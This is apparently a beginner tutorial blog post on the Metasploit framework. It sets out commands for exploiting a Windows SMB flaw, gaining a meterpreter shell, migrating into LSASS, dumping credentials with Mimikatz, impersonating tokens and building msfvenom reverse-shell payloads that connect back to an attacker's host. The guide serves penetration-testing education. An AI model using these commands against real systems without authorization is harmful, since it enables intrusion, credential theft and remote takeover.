Hack Like a Pro: Metasploit for Cybersecurity Beginners

Metasploit is a hacking framework, much like a Swiss army knife, equipped with numerous tools for conducting penetration tests from start to finish. While it encompasses a wide array of functionalities, this guide will focus on some core components, particularly the auto exploits feature, which simplifies and accelerates the exploitation process. Related Video:

Ethical Hacking Disclaimer

Remember, ethical hacking is about using your skills for legal and constructive purposes. Always ensure you have explicit permission before attempting any penetration testing.

Initial Steps: Finding Vulnerabilities

Before exploiting a system, you need to identify its vulnerabilities. This process involves reconnaissance and enumeration. For instance, using Nmap to scan for open ports and services.

Launching Metasploit

To start Metasploit, use:

msfconsole -q

The -q flag suppresses the ASCII art, keeping your terminal neat.

Searching for Exploits

Use the search function to find relevant exploits. For example, if targeting an Apache vulnerability:

search apache 2.2.2

You can also search by CVE number and anything else that may identify a specific vulnerable service.

A list of modules will appear, and you can select the appropriate one. To select the appropriate module, you can do:

use [search result number]

Example:

use 0

You can also use a module by specifying the exact module you want to use in full like this:

use exploit/windows/smb/ms08_067_netapi

Setting Up and Running the Exploit

Once you’ve chosen a module, configure its options:

use exploit/windows/smb/ms08_067_netapi
set RHOST <target IP>
set RHOST <target IP>
set LHOST <your IP>
set LPORT <listening port>

If you are unsure what options are available to you, you can view options like this:

options

Run the exploit with:

run

or

exploit

If successful, you’ll gain a meterpreter shell, granting you extensive control over the target system.

Post-Exploitation

In the meterpreter shell, you can execute various commands such as:

getuid
shell
upload <local file> <remote path>
download <remote file> <local path>

Migrating Processes

Process migration helps in maintaining a stable connection and evading detection. To migrate into another process, first identify the process ID (PID) of the target process:

pgrep <process_name>

For example, to find the PID of the LSASS process:

pgrep lsass

Then, migrate to the identified process:

migrate <PID>

Replace <PID> with the actual process ID found in the previous step.

Once you migrate into lsass, you can now use Mimikatz.

Using Mimikatz to Dump Password Hashes

One of the powerful tools integrated within Metasploit is Mimikatz, known for its ability to extract plaintext passwords, hash dumps, and more from memory. Let's explore how to use Mimikatz through Metasploit to dump password hashes from a compromised system.

load kiwi

This command loads the Kiwi extension, providing access to Mimikatz commands.

To dump all password hashes from the system, use the following command:

creds_all

This command will list all the password hashes for users on the system, allowing you to see the hashed credentials.

Impersonating Tokens

You can also do token impersonation, which can be useful for maintaining access or escalating privileges further. To list available tokens, use:

list_tokens -u

This will display all user tokens available for impersonation. To impersonate a specific token, use:

impersonate_token <token>

Exploit Suggestor

Additionally, you can escalate privileges using the exploit suggestor. First, you have to background the current meterpreter session:

background

You list all your active sessions with:

sessions

Then, you can see each session's ID. By default, your first session will be '1'.

To use the exploit suggestor:

use post/multi/recon/local_exploit_suggester
set SESSION 1
run

This may provide a list of potential exploits to elevate your access.

Creating Reverse Shells with MSFVenom

Metasploit’s MSFVenom tool allows you to generate payloads for reverse shells:

msfvenom -p windows/meterpreter/reverse_https LHOST=<your IP> LPORT=443 -f aspx -o hacker.aspx

This is just one example of how to use MSFVenom. You can specify many other options, such as Linux, x64, non-meterpreter shells, TCP connections, different file formats, and stageless payloads. For example, a x64-bit Linux machine standard reverse shell could look like this:

msfvenom -p Linux/x64/shell_reverse_tcp LHOST=<your IP> LPORT=443 -f elf -o hacker.elf

You can use the tab autocomplete to see what is available. Overall, MSFVenom is very customizable.

Wrapping Up

This guide covers only the basics of Metasploit. The framework offers a wealth of tools and capabilities to assist in ethical hacking.